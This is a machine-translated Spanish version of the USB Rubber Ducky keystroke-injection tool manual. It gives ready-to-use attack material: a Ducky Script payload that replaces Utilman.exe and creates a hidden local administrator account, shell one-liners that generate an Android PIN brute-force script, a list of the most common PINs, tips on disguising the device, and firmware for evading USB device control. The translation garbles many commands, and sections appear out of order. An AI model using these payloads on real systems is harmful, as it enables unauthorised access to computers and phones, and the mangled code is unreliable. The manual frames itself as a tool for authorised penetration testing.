2
2
2
Descargo de responsabilidad 4
Caractersticas de un vistazo 4 en
Historia 4
Conozca su Ducky 5
Hardware 5
Ducky Guin general 5
Mdulos / Firmware adicional 5
La historia de Bob 6
Conexin por primera vez 7
Generando tu primer Ducky Guin 7
Utilizando Encoder Versin 1 7
Su primer guin 7
Utilizando Encoder Versin 2.1 + 8
Su primer guin 8
Cdigo de ejemplo Ducky 9
Ventanas Wallpaper Prank 9
Ventanas Utilman Exploit 10
Ducky In Disguise 12
Caso USB 12
De poner el caso en conjunto 12
Extraccin del Caso 12
Pato de la novedad 12
Ducky y Android 13
Linux - Bash script 14
OSX - Shell Script 14
Mejoras 14
Soporte 15
Crditos 16
Gracias 16
Apndice: Especificacin 17
Atmel AT32UC3B1256 Caractersticas 17
Apndice: Gua Intermitente - Windows 18
Instalacin 18
Atmel Conductor 18
Intermitente 21
Apndice: Intermitente Gua - Linux / OSX 22
Introduccin 22
La compilacin de 22
La actualizacin del firmware 22
Dump (copia de seguridad) de firmware actual 22
Actualizacin 22
Apndice: Definiciones de firmware 23
Apndice: Trucos 25
Cambie el VID y el PID de la Ducky Firmware v1 25
Busque el VID y PID 25
Tabla Hex 25
Renuncia
El Ducky (USB Rubber Ducky) es una herramienta de pruebas de penetracin
USB para su uso en las auditoras de seguridad autorizados cuando lo permita.
Revise las leyes y obtener permiso antes de usar. Hak5, LLC y sus afiliadas
afirman ninguna responsabilidad por el uso no autorizado o daos. Por favor
hackear responsablemente.
Caractersticas de un vistazo
Sencillo lenguaje de scripts
Plataforma Cruz
-Tipo HID de ataque ms rpido que un humano
Software de control de dispositivos de derivacin
fuerza bruta Iniciar sesin Interfaces
Figura 1: El Rubber Ducky USB
Historia
Tras el xito de la Switchblade USB, la plataforma de ataque que era super
efectivo contra objetivos locales de Windows, la comunidad Hak5 ha desarrollado
un nuevo tipo de ataque - esta plataforma cruzada tiempo (Windows, Mac, Linux) que logra resultados mortales hacindose pasar por un teclado ubicua.
El Rubber Ducky USB no es su HID ordinario (Human Interface Device). Junto con
un potente procesador de 60 MHz de 32 bits y un simple lenguaje de scripting que
nadie es capaz de elaborar cargas tiles capaces de cambiar la configuracin del
sistema, la apertura de las puertas traseras, recuperacin de datos, iniciando
conchas inversa, o bsicamente cualquier cosa que se puede lograr con el acceso
fsico - todo automatizado y ejecutado en cuestin de segundos.
Multiplataforma: Ataques cualquier sistema operativo que soporta teclados USB.
Lenguaje de scripting simple: Comience a escribir cargas tiles en minutos.
Open Firmware Fuente: Agregar funcionalidad utilizando libreras incluidas.
Almacenamiento ampliable: tarjetas Micro SD hacen posible llevar a mltiples
cargas.
Apoyo a la Comunidad: Acciones scripts de ejemplo, cargas tiles completos y
obtener ayuda en lnea.
Conozca su Ducky
Hardware
AVR 32bit Micro-Controller
o AT32UC3B1256
o 256Kbytes almacenamiento interno de Flash
o de alta velocidad USB 2.0 BUS
Lector de tarjetas Micro SD
Push Button Micro
El indicador LED multicolor
Conector USB estndar "Tipo A"
Especificacin completa se puede encontrar en el Apndice:
Especificaciones.
Ducky Guin general
Ducky Script es el lenguaje del USB Rubber Ducky. Escribir guiones para que se
puede hacer desde cualquier editor de texto ASCII comn, como el Bloc de notas,
vi, emacs, nano, gedit, kedit, TextEdit, etc.
Sintaxis Ducky Script es simple. Cada comando reside en una nueva lnea y
puede tener opciones de seguir. Los comandos se escriben en maysculas,
porque los patos son fuertes y les gusta graznar con orgullo. La mayora de los
comandos invocan las pulsaciones de teclado, clave combos o cadenas de texto,
mientras que algunos retrasos oferta o pausas.
A diferencia de la Teensy, donde el conocimiento de conocimientos de
programacin basado en C y basado en Arduino es una necesidad. Ducky Guin
pretende ser un lenguaje de alto nivel que cualquier persona de cualquier nivel de
habilidad o edad puede aprender rpidamente.
Mdulos / Firmware adicional
La comunidad ha ayudado a construir una funcionalidad adicional Ducky mediante
la publicacin de firmware:
Soporte Multi Sistema Operativo
Almacenamiento masivo
Mltiple de carga til de entrega
Dispositivo compuesto (Almacenamiento y HID Misa Emulacin Teclado)
Ms detalles sobre el firmware retrospectiva, su uso y limitaciones se pueden
encontrar en el Apndice: Definiciones de firmware.
La historia de Bob
Bob es un Penetration Tester Profesional de la especialidad de la empresa X. Bob
est compromisos de ingeniera social. Compaa ACME-Financiera, ha
contratado a la empresa X (Bobs empleador) para realizar algunas pruebas de
intrusin anual para asegurar que todos sus clientes informacin financiera es
segura, y no puede ser hackeado por una tercera parte (espionaje industrial). La
evaluacin implica probar la infraestructura y la aplicacin estndar, pero ACMEfinanciera son, adems, preocupado por la ingeniera social (SE); podra alguien
simplemente entrar en el edificio y empezar a atacarlos desde su propio sistema.
ENTRAR
RETRASO 50
CADENA xcopy util / Utilman.exe \
ENTRAR
RETRASO 50
Rmdir CADENA / s / q util
ENTRAR
RETRASO 50
Salida CADENA
ENTRAR
RETRASO 50
GUI u
CADENA net user Local000 / add
ENTRAR
RETRASO 50
Administradores STRING localgroup neta Local000 / add
ENTRAR
RETRASO 50
Salida CADENA
ENTRAR
RETRASO 50
GUI r
Cmd STRING
ENTRAR
RETRASO 50
CADENA cd "% systemroot% \ System32"
ENTRAR
RETRASO 50
CADENA eliminar Utilman.exe
ENTRAR
RETRASO 50
STRING y
ENTRAR
RETRASO 50
Ren STRING Utilman.exe.bak Utilman.exe
ENTRAR
RETRASO 50
Salida CADENA
ENTRAR
GUI
Cmd STRING
MEN
CADENA un
ENTRAR
RETRASO 50
IZQUIERDA
ENTRAR
RETRASO 200
CADENA Local000 net user *
ENTRAR
Hak5 CADENA
ENTRAR
Hak5 CADENA
ENTRAR
Salida CADENA
ENTRAR
Ducky In Disguise
Caso USB
Para hacer el patito ms eficaz y duradera durante los compromisos, la Ducky
ahora viene con un estuche USB. La carcasa est moldeada especficamente a la
junta directiva de la Ducky por un agradable, en forma convincente ceido.
Figura 2: El Caso Ducky
Figura 3: Novelty Rubber Ducky
De poner el caso en conjunto
El Ducky deber insertarse fcilmente en la base, entonces usted puede
fcilmente en la cubierta superior y la cubierta metlica opcional; por lo que se ve
como un dispositivo USB normales / promocional. Ver Figura 2: El Caso Ducky.
Extraccin del Caso
El caso negro tiene un pequeo agujero en la parte posterior (opuesto de la Una
interfaz USB). Simplemente inserte un alfiler o clip para separar las dos partes
moldeadas negras, para recuperar el desnudo Ducky.
Pato de la novedad
Usted tambin debera haber recibido un pato de goma novedad (uno de muchos
colores surtidos). Para hacer su Ducky parezca un dispositivo USB de la novedad.
Su "novedad" Ducky necesita un poco de ciruga.
Advertencia: Cuchillos estn afilados, cuidado!
Simplemente corte una pequea incisin lateral en el trasero de la Ducky, luego
apriete el culo de la Ducky y suavemente inserte el (Tarjeta electrnica) Ducky. A
continuacin, debe tener algo parecido a la Figura 3: Novelty Ducky de goma.
Ducky y Android
Darren descubri que un Ducky se podra utilizar para un ataque de fuerza bruta
Pin Android. Hasta el momento ha funcionado a la perfeccin en un Galaxy
Nexus / Nota ejecutando la ltima Android 4.2.1.
Figura 4: Son Droids miedo de Patos elctricos?
Para este ataque funcione se necesita un USB (micro) On-The-Go cable (OTG)
como el que se muestra a continuacin:
Figura 5: Un cable USB OTG
Con un PIN de 4 dgitos y el valor por defecto de 5 intentos, seguido de un
segundo tiempo de espera de 30 usted est buscando en el mejor de los caso de
agotar el espacio clave en alrededor de 16,6 horas. Afortunadamente el USB
Rubber Ducky nunca se cansa, aburrido o tiene que hacer pis.
En lugar de publicar los casi 600K Ducky Guin continuacin es el script bash
utilizado para crearlo. Usted podra modificarlo para hacer 5 dgitos, pero que
tomara 166 horas. 10 dgitos tomaran 1902,2 aos.
Linux - Bash script
eco RETRASO 5000> android_brute-force_0000-9999.txt; {echo 0000..9999} |
xargs -n 1 echo STRING | sed '0 ~ 5 s / $ / \ nWAIT / g' | sed '0 ~ 1 s / $ / \ nDELAY
1000 \ NIntroduzca \ NIntroduzca / g' | >> android_brute-force_0000-9999.txt sed '/
ESPERA / DELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca \ nDELAY
5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca / g s'
OSX - Shell Script
eco RETRASO 5000> android_brute-force_0000-9999.txt; {echo 0000..9999} |
xargs -n 1 echo STRING | GSED '0 ~ 5 s / $ / \ nWAIT / g' | GSED '0 ~ 1 s / $ / \
nDELAY 1000 \ NIntroduzca \ NIntroduzca / g' | >> android_brute-force_00009999.txt GSED '/ ESPERA / DELAY 5000 \ NIntroduzca \ nDELAY 5000 \
NIntroduzca \ nDELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca / g s'
Mejoras
Es posible que desee modificar el script Ducky para tratar los 10 pernos de
telfono ms comunes, antes de que los intentos de fuerza bruta:
1234
1111
0000
1212
7777
1004
2000
4444
2222
6969
Apoyo
Las actualizaciones de software, segmentos relacionados de la feria Hak5,
artculos de blog Hak5 y los foros USB Rubber Ducky estn vinculados desde el
sitio usbrubberducky.com. Las preocupaciones sobre los pedidos pueden dirigirse
a [email protected].
Figura 6: USB Foro Rubber Ducky
Instalacin
Esto es muy fcil y se puede completar en 2-3 pasos:
1. Instale Visual C ++ Redistributable
2. Instale tirn
3. Instale Atmel Conductor
4. Actualice el dispositivo Atmel DFU en el Administrador de dispositivos
Atmel Conductor
Inserte el Ducky en modo DFU (manteniendo pulsado el botn del Ducky abajo de
forma continua, mientras que la insercin de la Ducky en el PC)
Si Windows no se instala automticamente el controlador correcto, no se preocupe
un manual de instalacin resolver el problema.
Abra el Administrador de dispositivos:
Windows XP: Haga clic derecho en Mi PC -> Propiedades - Perfiles> Hardware ->
Administrador de dispositivos
Windows Vista +: Haga clic derecho en Mi PC -> Propiedades -> Administrador de
dispositivos
El dispositivo Atmel se puede encontrar bajo otros dispositivos, y debe tener un
pequeo icono de advertencia amarillo - acusar problemas con los controladores.
Tenemos que actualizar el controlador, logrado siguiendo los siguientes pasos:
Figura 7: Administrador de dispositivos - Encuentra el dispositivo USB Atmel
Haga clic en el icono "AT32UC3B DFU" y seleccione "Actualizar controlador"
Figura 8: Actualice el controlador Atmel
Manualmente Buscar / Especifique el conductor Lugar
Figura 9: Instalacin manual de Atmel Conductor
Instale el controlador de Windows Lib-USB:
Figura 10: Instalacin de Lib-USB Driver
Instalacin del controlador completo:
Figura 11: Instalacin del controlador Atmel completa
Intermitente
Primero inserte el patito manteniendo continuamente presionado el pequeo botn
negro.
Esto pone el patito en modo DFU; tenemos que estar en este modo de actualizar
el firmware.
Es bastante sencillo, basta con ejecutar:
program.bat new_firmware.hex
Apndice: Intermitente Gua - Linux / OSX
Introduccin
En el agarre lateral Unix / OSX estos scripts de shell agradable para el vertimiento
existente y programar el nuevo firmware. Disponible aqu: DFU-programador-0.5.4
Nota: Hay problemas reportados con versin DFU-programador 0.5.2, por favor
intente la versin ms reciente en el enlace que aparece arriba.
Compilacin
Extraiga el paquete, configurar, hacer e instalar:
tar -xzf DFU-programador-0.5.4.tgz
cd DFU-programador-0.5.4
./configure
hacer
sudo make install
La actualizacin del firmware
Dump (copia de seguridad) de firmware actual
sudo DFU-programador volcado at32uc3b1256> dump.bin
No se olvide de restablecer el Ducky:
sudo reinicio at32uc3b1256 DFU-programador
Actualizacin
Paso 1 - borrar el patito:
sudo DFU-programador at32uc3b1256 borrado
Paso 2 - actualizar el firmware:
sudo DFU-programador at32uc3b1256 parpadea --suppress-bootloader-mempatito update.hex
Paso 3 - No se olvide de restablecer el Ducky:
sudo reinicio at32uc3b1256 DFU-programador
Apndice: Definiciones de firmware
Pato
Duck.hex el firmware de pato original, mejorado para trabajar en todo del sistema
operativo (Win, Unix, OSX, Android, +).
Grasa de pato
USB.hex convierte el Ducky en un dispositivo USB de almacenamiento masivo.
Originalmente burlado, como intil; algunas personas pierden el potencial /
propsito de este proyecto. Originalmente desarrollado para eludir el software de
control de dispositivo que los cdigos de la lista de negro / lista blanca de
dispositivos USB con sede fuera de VID y PID. A medida que el Ducky es
programable, por lo-largo como VID vlida se utiliz / clase de dispositivo PID, la
Ducky podra eludir el software de control del dispositivo.
Este fue lanzado pblicamente cuando el apoyo Ducky pareca disminuir. Los
pensamientos eran al menos la gente podra convertir su pato en una unidad USB
til, en lugar de tener un proyecto fallido atrapado en un cajn (La gente se haba
bifurcado originalmente fuera de $ 80 (USD) para uno de estos muchachos poco).
Otros llaman Ducky propietarios Quackers.
Pato Detour (anteriormente conocido como el "Pato Naked")
El firmware m_duck.hex apoya-mltiples cargas tiles:
inject.bin - carga por defecto (siempre que se ejecute)
inject2.bin - NUM_LOCK
inject3.bin - Bloq Mays
inject4.bin - bloqueo de desplazamiento
GUI d
MEN
CADENA v
CADENA d
// Cambiar al escritorio, tire hacia arriba de men contextual y elegir acciones V,
despus cambia d muestran los iconos del escritorio de Windows //
SHIFT
A diferencia de Bloq Mays, control de travesa para fresco, el comando SHIFT se
puede utilizar cuando se navega campos para seleccionar texto, entre otras
funciones. Comando ^ ^ ^ Opcional Parmetro | SHIFT | DELETE, HOME,
INSERT, RePg, AvPg, VENTANAS, GUI, UPARROW, Downarrow, FLECHA
IZQUIERDA, FLECHA DERECHA, TAB |
INSERT SHIFT
REM es pasta para la mayora de sistemas operativos
ALT
Encontrado a la izquierda de la tecla de espacio en la mayora de los teclados, la
tecla ALT es fundamental en muchas de las operaciones de automatizacin. ALT
es envidioso de CONTROL. Comando ^ ^ ^ Opcional Parmetro | ALT | FIN, ESC,
ESC, F1 ... F12, individual Char, ESPACIO, TAB |
GUI r
RETRASO 50
Notepad.exe CADENA
ENTRAR
RETRASO 100
CADENA Hello World
ALT f
CADENA s
REM alt-f se detiene en el men Archivo y s salva. Esta dos combo de teclas es la
razn por la ALT es celoso de leetness de CONTROL y CTRL + S
CONTROL o CTRL
El rey de clave combos, CONTROL es todo poderoso. Comando ^ ^ ^ Parmetros
opcionales | CONTROL | DESCANSO, PAUSA, F1 ... F12, ESC, ESC, individual
Char | | CTRL | DESCANSO, PAUSA, F1 ... F12, ESC, ESC, individual Char |
ESCAPE DE CONTROL
REM esto es equivalente a la clave GUI en Windows
Teclas de flecha
Comando ^ ^ | Downarrow o DOWN | | FLECHA IZQUIERDA o A LA IZQUIERDA | |
FLECHA DERECHA o A LA DERECHA | | UPARROW o UP |
Comandos extendidas
Comando ^ ^ ^ Notas | INTER o PAUSA | Para el combo infame CTRL RECESO | |
BloqMays | Control de crucero para enfriar. Alterna | | DELETE | | | FIN | Cundo
es que alguna vez | | ESC o ESCAPE | Puede nunca | | HOME | No hay lugar
como el | | INSERT | | | BLOQ NUM | Alterna bloqueo numrico | | RePg | | |
AvPg | |
Ejemplo 1:
...
Software Windows
acciones?
La solucin es simple.
DE ACUERDO.
Comando: